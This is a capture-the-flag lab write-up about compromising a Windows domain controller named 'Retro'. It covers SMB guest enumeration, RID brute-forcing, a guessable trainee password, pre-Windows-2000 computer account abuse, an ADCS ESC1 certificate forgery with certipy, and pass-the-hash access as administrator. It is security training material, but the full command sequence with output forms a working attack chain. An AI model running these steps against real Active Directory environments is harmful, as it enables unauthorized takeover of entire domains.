Overview
The machine starts by null SMB authentication that exposes a Trainees share with a note hinting at a shared account, RID brute-force reveals the trainee user with a weak password matching the username, then accessing the Notes share gives a todo note about a pre-created computer account BANKING$ which authenticates with pre2k conventions, changing its password unlocks ADCS enrollment rights on a RetroClients template vulnerable to ESC1, requesting a certificate with the administrator UPN and explicit SID produces a valid pfx, authenticating with it retrieves the administrator NT hash to get full domain compromise.
Enumeration
As usual we'll start by nmap Enumeration
nmap -sC -sV -vv -oA init -Pn 10.129.234.44
Nmap scan report for 10.129.234.44
Host is up, received user-set (0.16s latency).
Scanned at 2026-06-03 10:42:05 PDT for 107s
Not shown: 989 filtered tcp ports (no-response)
PORT STATE SERVICE REASON VERSION
53/tcp open domain syn-ack Simple DNS Plus
88/tcp open kerberos-sec syn-ack Microsoft Windows Kerberos (server time: 2026-06-03 09:42:26Z)
135/tcp open msrpc syn-ack Microsoft Windows RPC
139/tcp open netbios-ssn syn-ack Microsoft Windows netbios-ssn
389/tcp open ldap syn-ack Microsoft Windows Active Directory LDAP (Domain: retro.vl0., Site: Default-First-Site-Name)
| _ssl-date: 2026-06-03T09:43:49+00:00; -8h00m01s from scanner time.
| ssl-cert: Subject: commonName=DC.retro.vl
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC.retro.vl
| Issuer: commonName=retro-DC-CA/domainComponent=retro
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2024-10-02T10:33:09
| Not valid after: 2025-10-02T10:33:09
| MD5: 0570:85e4:2e0b:442c:16c0:d258:3acb:1019
| SHA-1: 0b6c:b037:2581:5555:b186:8ca2:35e7:21db:2c8d:56d6
< SNIP>
445/tcp open microsoft-ds? syn-ack
464/tcp open kpasswd5? syn-ack
593/tcp open ncacn_http syn-ack Microsoft Windows RPC over HTTP 1.0
3268/tcp open ldap syn-ack Microsoft Windows Active Directory LDAP (Domain: retro.vl0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC.retro.vl
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC.retro.vl
| Issuer: commonName=retro-DC-CA/domainComponent=retro
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2024-10-02T10:33:09
| Not valid after: 2025-10-02T10:33:09
| MD5: 0570:85e4:2e0b:442c:16c0:d258:3acb:1019
| SHA-1: 0b6c:b037:2581:5555:b186:8ca2:35e7:21db:2c8d:56d6
< SNIP>
| _ssl-date: 2026-06-03T09:43:49+00:00; -8h00m00s from scanner time.
3269/tcp open ssl/ldap syn-ack Microsoft Windows Active Directory LDAP (Domain: retro.vl0., Site: Default-First-Site-Name)
| _ssl-date: 2026-06-03T09:43:50+00:00; -8h00m00s from scanner time.
| ssl-cert: Subject: commonName=DC.retro.vl
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC.retro.vl
| Issuer: commonName=retro-DC-CA/domainComponent=retro
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2024-10-02T10:33:09
| Not valid after: 2025-10-02T10:33:09
| MD5: 0570:85e4:2e0b:442c:16c0:d258:3acb:1019
| SHA-1: 0b6c:b037:2581:5555:b186:8ca2:35e7:21db:2c8d:56d6
< SNIP>
3389/tcp open ms-wbt-server syn-ack Microsoft Terminal Services
| ssl-cert: Subject: commonName=DC.retro.vl
| Issuer: commonName=DC.retro.vl
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2026-06-02T09:30:34
| Not valid after: 2026-12-02T09:30:34
| MD5: 0ebb:6ca3:608f:8c19:b3b9:3939:c14f:b6e1
| SHA-1: 1a9d:230e:7bd5:cb01:027b:dd79:3c19:a364:1a0f:4c31
< SNIP>
| _ssl-date: 2026-06-03T09:43:50+00:00; -8h00m00s from scanner time.
| rdp-ntlm-info:
| Target_Name: RETRO
| NetBIOS_Domain_Name: RETRO
| NetBIOS_Computer_Name: DC
| DNS_Domain_Name: retro.vl
| DNS_Computer_Name: DC.retro.vl
| Product_Version: 10.0.20348
| _ System_Time: 2026-06-03T09:43:09+00:00
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| _clock-skew: mean: -8h00m00s, deviation: 0s, median: -8h00m01s
| smb2-security-mode:
| 3:1:1:
| _ Message signing enabled and required
| p2p-conficker:
| Checking for Conficker.C or higher...
| Check 1 (port 36202/tcp): CLEAN (Timeout)
| Check 2 (port 15073/tcp): CLEAN (Timeout)
| Check 3 (port 52836/udp): CLEAN (Timeout)
| Check 4 (port 52986/udp): CLEAN (Timeout)
| _ 0/4 checks are positive: Host is CLEAN or ports are blocked
| smb2-time:
| date: 2026-06-03T09:43:10
| _ start_date: N/A
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Wed Jun 3 10:43:52 2026 -- 1 IP address (1 host up) scanned in 106.68 secondsobviously this is an active directory environment and here is what we got
- domain name is
retro.vland the FQDN isdc.retro.vl - there is ADCS in place with the CA
retro-DC-CA - 0 second clock skew so we won't worry about it
so lets setup the environment
so add the hostname, FQDN and domain name to hosts file generate krb5file and move it
┌─[]─[10.10.16.83]─[jimmex@attacker]─[~/htb/labs/retro]
└──╼ [★]$ echo '10.129.234.44 DC DC.retro.vl retro.vl' | sudo tee -a /etc/hosts
10.129.234.44 DC DC.retro.vl retro.vl
┌─[]─[10.10.16.83]─[jimmex@attacker]─[~/htb/labs/retro]
└──╼ [★]$ nxc smb 10.129.234.44 -u '' -p '' --generate-krb5-file krb5.conf
SMB 10.129.234.44 445 DC [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:retro.vl) (signing:True) (SMBv1:None) (Null Auth:True)
SMB 10.129.234.44 445 DC [+] krb5 conf saved to: krb5.conf
SMB 10.129.234.44 445 DC [+] Run the following command to use the conf file: export KRB5_CONFIG=krb5.conf
SMB 10.129.234.44 445 DC [+] retro.vl\:
┌─[]─[10.10.16.83]─[jimmex@attacker]─[~/htb/labs/retro]
└──╼ [★]$ sudo mv krb5.conf /etc/krb5.conf when you look at the krb5file generation you'll see that Null Auth:True so lets test it
Trainees Share as Guest
and as you can see we got READ access over Trainees shares so lets take a look
┌─[]─[10.10.16.83]─[jimmex@attacker]─[~/htb/labs/retro]
└──╼ [★]$ nxc smb 10.129.234.44 -u 'Guest' -p '' --shares
SMB 10.129.234.44 445 DC [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:retro.vl) (signing:True) (SMBv1:None) (Null Auth:True)
SMB 10.129.234.44 445 DC [+] retro.vl\Guest:
SMB 10.129.234.44 445 DC [*] Enumerated shares
SMB 10.129.234.44 445 DC Share Permissions Remark
SMB 10.129.234.44 445 DC ----- ----------- ------
SMB 10.129.234.44 445 DC ADMIN$ Remote Admin
SMB 10.129.234.44 445 DC C$ Default share
SMB 10.129.234.44 445 DC IPC$ READ Remote IPC
SMB 10.129.234.44 445 DC NETLOGON Logon server share
SMB 10.129.234.44 445 DC Notes
SMB 10.129.234.44 445 DC SYSVOL Logon server share
SMB 10.129.234.44 445 DC Trainees READwe got a file called Important.txt and the file mentions the next information trainees forget their unique password so they got all of those trainees into a single account so lets try to find this username either by wordlist or RID brute force
┌─[]─[10.10.16.83]─[jimmex@attacker]─[~/htb/labs/retro]
└──╼ [★]$ smbclient //retro.vl/Trainees -U'Guest'%''
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Sun Jul 23 14:58:43 2023
.. DHS 0 Wed Jun 11 07:17:10 2025
Important.txt A 288 Sun Jul 23 15:00:13 2023
4659711 blocks of size 4096. 1325494 blocks available
smb: \> get Important.txt
getting file \Important.txt of size 288 as Important.txt (0.6 KiloBytes/sec) (average 0.6 KiloBytes/sec)
smb: \> exit
┌─[]─[10.10.16.83]─[jimmex@attacker]─[~/htb/labs/retro]
└──╼ [★]$ cat Important.txt
Dear Trainees,
I know that some of you seemed to struggle with remembering strong and unique passwords.
So we decided to bundle every one of you up into one account.
Stop bothering us. Please. We have other stuff to do than resetting your password every day.
Regards
The Adminsso my guess for the username was either trainee or trainees and we got access over that //pipe so we could bruteforce the RID anyway and no need to guess anything
┌─[]─[10.10.16.83]─[jimmex@attacker]─[~/htb/labs/retro]
└──╼ [★]$ nxc smb 10.129.234.44 -u 'Guest' -p '' --rid-brute
SMB 10.129.234.44 445 DC [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:retro.vl) (signing:True) (SMBv1:None) (Null Auth:True)
SMB 10.129.234.44 445 DC [+] retro.vl\Guest:
SMB 10.129.234.44 445 DC 498: RETRO\Enterprise Read-only Domain Controllers (SidTypeGroup)
SMB 10.129.234.44 445 DC 500: RETRO\Administrator (SidTypeUser)
SMB 10.129.234.44 445 DC 501: RETRO\Guest (SidTypeUser)
SMB 10.129.234.44 445 DC 502: RETRO\krbtgt (SidTypeUser)
SMB 10.129.234.44 445 DC 512: RETRO\Domain Admins (SidTypeGroup)
SMB 10.129.234.44 445 DC 513: RETRO\Domain Users (SidTypeGroup)
SMB 10.129.234.44 445 DC 514: RETRO\Domain Guests (SidTypeGroup)
SMB 10.129.234.44 445 DC 515: RETRO\Domain Computers (SidTypeGroup)
SMB 10.129.234.44 445 DC 516: RETRO\Domain Controllers (SidTypeGroup)
SMB 10.129.234.44 445 DC 517: RETRO\Cert Publishers (SidTypeAlias)
SMB 10.129.234.44 445 DC 518: RETRO\Schema Admins (SidTypeGroup)
SMB 10.129.234.44 445 DC 519: RETRO\Enterprise Admins (SidTypeGroup)
SMB 10.129.234.44 445 DC 520: RETRO\Group Policy Creator Owners (SidTypeGroup)
SMB 10.129.234.44 445 DC 521: RETRO\Read-only Domain Controllers (SidTypeGroup)
SMB 10.129.234.44 445 DC 522: RETRO\Cloneable Domain Controllers (SidTypeGroup)
SMB 10.129.234.44 445 DC 525: RETRO\Protected Users (SidTypeGroup)
SMB 10.129.234.44 445 DC 526: RETRO\Key Admins (SidTypeGroup)
SMB 10.129.234.44 445 DC 527: RETRO\Enterprise Key Admins (SidTypeGroup)
SMB 10.129.234.44 445 DC 553: RETRO\RAS and IAS Servers (SidTypeAlias)
SMB 10.129.234.44 445 DC 571: RETRO\Allowed RODC Password Replication Group (SidTypeAlias)
SMB 10.129.234.44 445 DC 572: RETRO\Denied RODC Password Replication Group (SidTypeAlias)
SMB 10.129.234.44 445 DC 1000: RETRO\DC$ (SidTypeUser)
SMB 10.129.234.44 445 DC 1101: RETRO\DnsAdmins (SidTypeAlias)
SMB 10.129.234.44 445 DC 1102: RETRO\DnsUpdateProxy (SidTypeGroup)
SMB 10.129.234.44 445 DC 1104: RETRO\trainee (SidTypeUser)
SMB 10.129.234.44 445 DC 1106: RETRO\BANKING$ (SidTypeUser)
SMB 10.129.234.44 445 DC 1107: RETRO\jburley (SidTypeUser)
SMB 10.129.234.44 445 DC 1108: RETRO\HelpDesk (SidTypeGroup)
SMB 10.129.234.44 445 DC 1109: RETRO\tblack (SidTypeUser)there is a lot we can do about this user trainee like brute-force for the password and we'll get it eventually but think first what is the point of bundling the users in a single username if you are gonna make that account's password hard so my first guess would be the easiest password which will be the same as the username and as you can see it worked
┌─[]─[10.10.16.83]─[jimmex@attacker]─[~/htb/labs/retro]
└──╼ [★]$ nxc smb 10.129.234.44 -u trainee -p trainee
SMB 10.129.234.44 445 DC [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:retro.vl) (signing:True) (SMBv1:None) (Null Auth:True)
SMB 10.129.234.44 445 DC [+] retro.vl\trainee:traineeNotes Share as Trainee
earlier with the Guest account we found a share called Notes but we didn't have read access over so Lets check if we got read over it with this account and as you can see we can read it so lets take a look
┌─[]─[10.10.16.83]─[jimmex@attacker]─[~/htb/labs/retro]
└──╼ [★]$ nxc smb 10.129.234.44 -u trainee -p trainee --shares
SMB 10.129.234.44 445 DC [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:retro.vl) (signing:True) (SMBv1:None) (Null Auth:True)
SMB 10.129.234.44 445 DC [+] retro.vl\trainee:trainee
SMB 10.129.234.44 445 DC [*] Enumerated shares
SMB 10.129.234.44 445 DC Share Permissions Remark
SMB 10.129.234.44 445 DC ----- ----------- ------
SMB 10.129.234.44 445 DC ADMIN$ Remote Admin
SMB 10.129.234.44 445 DC C$ Default share
SMB 10.129.234.44 445 DC IPC$ READ Remote IPC
SMB 10.129.234.44 445 DC NETLOGON READ Logon server share
SMB 10.129.234.44 445 DC Notes READ
SMB 10.129.234.44 445 DC SYSVOL READ Logon server share
SMB 10.129.234.44 445 DC Trainees READwe got 2 files ToDo.txt and user.txt which might be the flag (would be the easiest flag we've seen so far)
┌─[]─[10.10.16.83]─[jimmex@attacker]─[~/htb/labs/retro]
└──╼ [★]$ smbclient //retro.vl/Notes -U'trainee'%'trainee'
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Tue Apr 8 20:12:49 2025
.. DHS 0 Wed Jun 11 07:17:10 2025
ToDo.txt A 248 Sun Jul 23 15:05:56 2023
user.txt A 32 Tue Apr 8 20:13:01 2025
4659711 blocks of size 4096. 1326768 blocks available
smb: \> get ToDo.txt
getting file \ToDo.txt of size 248 as ToDo.txt (0.5 KiloBytes/sec) (average 0.5 KiloBytes/sec)
smb: \> get user.txt
getting file \user.txt of size 32 as user.txt (0.1 KiloBytes/sec) (average 0.3 KiloBytes/sec)
smb: \>and it looks like the flag
Privilege Escalation
by looking into that ToDo.txt account we'll see they wanted to improve some security issue related to banking software and it mentiones a pre-created computer account and if you are not familiar with pre2k accounts it is simply a computer accounts with the same password as the username but without the trailing dollar sign and all letters are small this is standard in windows if you mark an account as pre2k it will get that password automatically without you even setting password for it
┌─[]─[10.10.16.83]─[jimmex@attacker]─[~/htb/labs/retro]
└──╼ [★]$ cat ToDo.txt
Thomas,
after convincing the finance department to get rid of their ancienct banking software
it is finally time to clean up the mess they made. We should start with the pre created
computer account. That one is older than me.
Best
Jamesby looking for the useranames we got earlier there is a computer account called Banking$ so lets try the password banking for it
cat usernames.txt
Administrator
Guest
krbtgt
Cert
RAS
DC$
DnsAdmins
trainee
BANKING$
jburley
tblackand as you can see it worked so lets see if this account can rdp
┌─[]─[10.10.16.83]─[jimmex@attacker]─[~/htb/labs/retro]
└──╼ [★]$ nxc smb 10.129.234.44 -u 'BANKING$' -p banking -k
SMB 10.129.234.44 445 DC [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:retro.vl) (signing:True) (SMBv1:None) (Null Auth:True)
SMB 10.129.234.44 445 DC [+] retro.vl\BANKING$:bankingand as you can see it worked but we need to use kerberos authentication not NTLM
┌─[]─[10.10.16.83]─[jimmex@attacker]─[~/htb/labs/retro]
└──╼ [★]$ nxc rdp 10.129.234.44 -u 'BANKING$' -p banking
RDP 10.129.234.44 3389 DC [*] Windows 10 or Windows Server 2016 Build 20348 (name:DC) (domain:retro.vl) (nla:True)
RDP 10.129.234.44 3389 DC [-] retro.vl\BANKING$:banking (CredSSP - Server sent an error! Code: 0xc0000199)
┌─[]─[10.10.16.83]─[jimmex@attacker]─[~/htb/labs/retro]
└──╼ [★]$ nxc rdp 10.129.234.44 -u 'BANKING$' -p banking -k
RDP 10.129.234.44 3389 DC [*] Windows 10 or Windows Server 2016 Build 20348 (name:DC) (domain:retro.vl) (nla:True)
RDP 10.129.234.44 3389 DC [+] retro.vl\BANKING$:bankingthe error NT_STATUS_NOLOGON_WORKSTATION_TRUST_ACCOUNT means that the account isn't trusted cause it is a pre2k so we need to change the password for this to work
but we validate earlier it is working with kerberos we will use kpasswd or rpc to change the password cause smb will get the same TRUST account issue
and as you can see it worked
┌─[]─[10.10.16.83]─[jimmex@attacker]─[~/htb/labs/retro]
└──╼ [★]$ changepasswd.py retro.vl/'BANKING$':banking@10.129.234.44 -newpass 'Password123!' -p kpasswd
Impacket v0.14.0.dev0+20260407.172353.7fc084ad - Copyright Fortra, LLC and its affiliated companies
[*] Changing the password of retro.vl\BANKING$
[*] No valid TGT for kadmin/changepw found in cache /home/jimmex/.nxc/modules/pre2k/ccache/banking.ccache
[*] Password was changed successfully.even though after this it didn't work
┌─[]─[10.10.16.83]─[jimmex@attacker]─[~/htb/labs/retro]
└──╼ [★]$ xfreerdp3 /v:retro.vl /u:'BANKING$' /d:retro.vl /p:'Password123!' /cert:ignore /sec:nla
[03:34:11:767] [94290:00017053] [WARN][com.freerdp.client.x11] - [load_map_from_xkbfile]: : keycode: 0x08 -> no RDP scancode found
[03:34:11:769] [94290:00017053] [WARN][com.freerdp.client.x11] - [load_map_from_xkbfile]: : keycode: 0x5D -> no RDP scancode found
[03:34:11:769] [94290:00017053] [WARN][com.freerdp.client.x11] - [load_map_from_xkbfile]: MDSW: keycode: 0xCB -> no RDP scancode found
[03:34:13:469] [94290:00017053] [ERROR][com.freerdp.core.transport] - [transport_read_layer]: BIO_read returned a system error 104: Connection reset by peer
[03:34:13:469] [94290:00017053] [ERROR][com.freerdp.core] - [transport_read_layer]: ERRCONNECT_CONNECT_TRANSPORT_FAILED [0x0002000D]
[03:34:15:243] [94290:00017053] [ERROR][com.freerdp.core.transport] - [transport_read_layer]: BIO_read returned a system error 104: Connection reset by peer
[03:34:15:243] [94290:00017053] [ERROR][com.freerdp.core] - [transport_read_layer]: ERRCONNECT_CONNECT_TRANSPORT_FAILED [0x0002000D]
[03:34:15:243] [94290:00017053] [ERROR][com.freerdp.core] - [freerdp_connect]: freerdp_post_connect failedthere is also ADCS that we didn't look at yet lets see if this account can do anything
so first I queried vulnerable templates
┌─[]─[10.10.16.83]─[jimmex@attacker]─[~/htb/labs/retro]
└──╼ [★]$ certipy find -u 'BANKING$' -p 'Password123!' -dc-ip 10.129.234.44 -vulnerable
Certipy v5.0.4 - by Oliver Lyak (ly4k)
[*] Finding certificate templates
[*] Found 34 certificate templates
[*] Finding certificate authorities
[*] Found 1 certificate authority
[*] Found 12 enabled certificate templates
[*] Finding issuance policies
[*] Found 15 issuance policies
[*] Found 0 OIDs linked to templates
[*] Retrieving CA configuration for 'retro-DC-CA' via RRP
[!] Failed to connect to remote registry. Service should be starting now. Trying again...
[*] Successfully retrieved CA configuration for 'retro-DC-CA'
[*] Checking web enrollment for CA 'retro-DC-CA' @ 'DC.retro.vl'
[!] Error checking web enrollment: timed out
[!] Use -debug to print a stacktrace
[!] Error checking web enrollment: timed out
[!] Use -debug to print a stacktrace
[*] Saving text output to '20260603033600_Certipy.txt'
[*] Wrote text output to '20260603033600_Certipy.txt'
[*] Saving JSON output to '20260603033600_Certipy.json'
[*] Wrote JSON output to '20260603033600_Certipy.json'and looking at the results we'll see that one of the Templates RetroClients is vulnerable to ESC1 which will allow us eventually to get administrator
ESC1 allows us to inject any UPN inside the certificates we are requesting
Certificate Templates
0
Template Name : RetroClients
Display Name : Retro Clients
Certificate Authorities : retro-DC-CA
Enabled : True
Client Authentication : True
Enrollment Agent : False
Any Purpose : False
Enrollee Supplies Subject : True
Certificate Name Flag : EnrolleeSuppliesSubject
Extended Key Usage : Client Authentication
Requires Manager Approval : False
Requires Key Archival : False
Authorized Signatures Required : 0
Schema Version : 2
Validity Period : 1 year
Renewal Period : 6 weeks
Minimum RSA Key Length : 4096
Template Created : 2023-07-23T21:17:47+00:00
Template Last Modified : 2023-07-23T21:18:39+00:00
Permissions
Enrollment Permissions
Enrollment Rights : RETRO.VL\Domain Admins
RETRO.VL\Domain Computers
RETRO.VL\Enterprise Admins
Object Control Permissions
Owner : RETRO.VL\Administrator
Full Control Principals : RETRO.VL\Domain Admins
RETRO.VL\Enterprise Admins
Write Owner Principals : RETRO.VL\Domain Admins
RETRO.VL\Enterprise Admins
Write Dacl Principals : RETRO.VL\Domain Admins
RETRO.VL\Enterprise Admins
Write Property Enroll : RETRO.VL\Domain Admins
RETRO.VL\Domain Computers
RETRO.VL\Enterprise Admins
[+] User Enrollable Principals : RETRO.VL\Domain Computers
[!] Vulnerabilities
ESC1 : Enrollee supplies subject and template allows client authentication.but when we try we get this error
┌─[]─[10.10.16.83]─[jimmex@attacker]─[~/htb/labs/retro]
└──╼ [★]$ certipy req -u 'BANKING$' -p 'Password123!' -dc-ip 10.129.234.44 -template 'RetroClients' -ca 'retro-DC-CA' -upn 'administrator@retro.vl' -target dc.retro.vl
Certipy v5.0.4 - by Oliver Lyak (ly4k)
[*] Requesting certificate via RPC
[*] Request ID is 10
[-] Got error while requesting certificate: code: 0x80094811 - CERTSRV_E_KEY_LENGTH - The public key does not meet the minimum size required by the specified certificate template.
Would you like to save the private key? (y/N):the issue is that the there is different key sizes and based on how the environment is configured we can try multiple keysizes and see which one will work
the 2048 was also rejected as the minimum key size
┌─[]─[10.10.16.83]─[jimmex@attacker]─[~/htb/labs/retro]
└──╼ [★]$ certipy req -u 'BANKING$' -p 'Password123!' -dc-ip 10.129.234.44 -template 'RetroClients' -ca 'retro-DC-CA' -upn 'administrator@retro.vl' -target dc.retro.vl -key-size 2048
Certipy v5.0.4 - by Oliver Lyak (ly4k)
[*] Requesting certificate via RPC
[*] Request ID is 11
[-] Got error while requesting certificate: code: 0x80094811 - CERTSRV_E_KEY_LENGTH - The public key does not meet the minimum size required by the specified certificate template.
Would you like to save the private key? (y/N): N
[-] Failed to request certificatebut 4096 worked and we got pfx file
┌─[]─[10.10.16.83]─[jimmex@attacker]─[~/htb/labs/retro]
└──╼ [★]$ certipy req -u 'BANKING$' -p 'Password123!' -dc-ip 10.129.234.44 -template 'RetroClients' -ca 'retro-DC-CA' -upn 'administrator@retro.vl' -target dc.retro.vl -key-size 4096
Certipy v5.0.4 - by Oliver Lyak (ly4k)
[*] Requesting certificate via RPC
[*] Request ID is 13
[*] Successfully requested certificate
[*] Got certificate with UPN 'administrator@retro.vl'
[*] Certificate has no object SID
[*] Try using -sid to set the object SID or see the wiki for more details
[*] Saving certificate and private key to 'administrator.pfx'
[*] Wrote certificate and private key to 'administrator.pfx'trying to auth using that pfx gets us an error that SID mismatches so lets specify the SID in the certificate we request and auth again
┌─[]─[10.10.16.83]─[jimmex@attacker]─[~/htb/labs/retro]
└──╼ [★]$ certipy auth -pfx administrator.pfx -dc-ip 10.129.234.44
Certipy v5.0.4 - by Oliver Lyak (ly4k)
[*] Certificate identities:
[*] SAN UPN: 'administrator@retro.vl'
[*] Using principal: 'administrator@retro.vl'
[*] Trying to get TGT...
[-] Object SID mismatch between certificate and user 'administrator'
[-] See the wiki for more informationlets get the SID first for the administrator which will be the domain sid + RID for the administrator
┌─[]─[10.10.16.83]─[jimmex@attacker]─[~/htb/labs/retro]
└──╼ [★]$ lookupsid.py retro.vl/'BANKING$':'Password123!'@10.129.234.44
Impacket v0.14.0.dev0+20260407.172353.7fc084ad - Copyright Fortra, LLC and its affiliated companies
[*] Brute forcing SIDs at 10.129.234.44
[*] StringBinding ncacn_np:10.129.234.44[\pipe\lsarpc]
[*] Domain SID is: S-1-5-21-2983547755-698260136-4283918172
498: RETRO\Enterprise Read-only Domain Controllers (SidTypeGroup)
500: RETRO\Administrator (SidTypeUser)
501: RETRO\Guest (SidTypeUser)
502: RETRO\krbtgt (SidTypeUser)
512: RETRO\Domain Admins (SidTypeGroup)
513: RETRO\Domain Users (SidTypeGroup)
514: RETRO\Domain Guests (SidTypeGroup)
515: RETRO\Domain Computers (SidTypeGroup)
516: RETRO\Domain Controllers (SidTypeGroup)and after trying it again with the SID provided in the request it worked and we got the administrator hash so lets get the flag
┌─[]─[10.10.16.83]─[jimmex@attacker]─[~/htb/labs/retro]
└──╼ [★]$ certipy req -u 'BANKING$' -p 'Password123!' -dc-ip 10.129.7.245 -template 'RetroClients' -ca 'retro-DC-CA' -upn 'administrator@retro.vl' -target dc.retro.vl -key-size 4096 -sid 'S-1-5-21-2983547755-698260136-4283918172-500'
Certipy v5.0.4 - by Oliver Lyak (ly4k)
[*] Requesting certificate via RPC
[*] Request ID is 10
[*] Successfully requested certificate
[*] Got certificate with UPN 'administrator@retro.vl'
[*] Certificate object SID is 'S-1-5-21-2983547755-698260136-4283918172-500'
[*] Saving certificate and private key to 'administrator.pfx'
File 'administrator.pfx' already exists. Overwrite? (y/n - saying no will save with a unique filename): y
[*] Wrote certificate and private key to 'administrator.pfx'
┌─[]─[10.10.16.83]─[jimmex@attacker]─[~/htb/labs/retro]
└──╼ [★]$ certipy auth -pfx administrator.pfx -dc-ip 10.129.7 -domain retro.vl -username administrator
Certipy v5.0.4 - by Oliver Lyak (ly4k)
[-] Got error: nameserver 10.129.7 is not a dns.nameserver.Nameserver instance or text form, IP address, nor a valid https URL
[-] Use -debug to print a stacktrace
┌─[]─[10.10.16.83]─[jimmex@attacker]─[~/htb/labs/retro]
└──╼ [★]$ certipy auth -pfx administrator.pfx -dc-ip 10.129.7.245 -domain retro.vl -username administrator
Certipy v5.0.4 - by Oliver Lyak (ly4k)
[*] Certificate identities:
[*] SAN UPN: 'administrator@retro.vl'
[*] SAN URL SID: 'S-1-5-21-2983547755-698260136-4283918172-500'
[*] Security Extension SID: 'S-1-5-21-2983547755-698260136-4283918172-500'
[*] Using principal: 'administrator@retro.vl'
[*] Trying to get TGT...
[*] Got TGT
[*] Saving credential cache to 'administrator.ccache'
[*] Wrote credential cache to 'administrator.ccache'
[*] Trying to retrieve NT hash for 'administrator'
[*] Got hash for 'administrator@retro.vl': aad3b435b51404eeaad3b435b51404ee:252fac7066d93dd009d4fd2cd0368389we'll use a smbclient.py cause we got a hash we also could've got TGT first then use it with smbclient
┌─[]─[10.10.16.83]─[jimmex@attacker]─[~/htb/labs/retro]
└──╼ [★]$ smbclient.py retro.vl/administrator:''@10.129.7.245 -hashes :252fac7066d93dd009d4fd2cd0368389
Impacket v0.14.0.dev0+20260407.172353.7fc084ad - Copyright Fortra, LLC and its affiliated companies
Type help for list of commands
# ls
[-] No share selected
# shares
ADMIN$
C$
IPC$
NETLOGON
Notes
SYSVOL
Trainees
# use C$
# ls
drw-rw-rw- 0 Sun Jul 23 13:48:13 2023 $Recycle.Bin
drw-rw-rw- 0 Tue Apr 8 19:15:31 2025 $WinREAgent
-rw-rw-rw- 112 Wed Jun 11 07:16:27 2025 bootTel.dat
drw-rw-rw- 0 Tue Apr 8 20:18:00 2025 Config.Msi
drw-rw-rw- 0 Sun Jul 23 21:05:10 2023 Documents and Settings
-rw-rw-rw- 12288 Wed Jun 3 03:58:21 2026 DumpStack.log.tmp
drw-rw-rw- 0 Wed Jun 11 07:16:20 2025 found.000
drw-rw-rw- 0 Tue Apr 8 20:16:08 2025 inetpub
drw-rw-rw- 0 Tue Apr 8 20:12:49 2025 Notes
-rw-rw-rw- 1207959552 Wed Jun 3 03:58:21 2026 pagefile.sys
drw-rw-rw- 0 Sun Jul 23 22:03:07 2023 PerfLogs
drw-rw-rw- 0 Tue Apr 8 19:06:35 2025 Program Files
drw-rw-rw- 0 Sun Jul 23 22:03:07 2023 Program Files (x86)
drw-rw-rw- 0 Mon May 5 03:25:11 2025 ProgramData
drw-rw-rw- 0 Sun Jul 23 21:05:14 2023 Recovery
drw-rw-rw- 0 Sun Jul 23 14:11:48 2023 System Volume Information
drw-rw-rw- 0 Sun Jul 23 15:16:11 2023 Trainees
drw-rw-rw- 0 Sun Jul 23 13:47:59 2023 Users
drw-rw-rw- 0 Tue Apr 8 20:18:52 2025 Windows
# cd Users
# cd Administrator
# cd Desktop
# get root.txtand as you can see
┌─[]─[10.10.16.83]─[jimmex@attacker]─[~/htb/labs/retro]
└──╼ [★]$ cat root.txt
40fce9c3f09024bcab29d377ee1ed071Resources
- https://www.thehacker.recipes/ad/movement/builtins/pre-windows-2000-computers
- https://www.semperis.com/blog/esc1-attack-explained/
- https://www.jimmexploit.blog/blog/timeroasting (about timeroasting but explained what is pre2k and its affect on other attacks)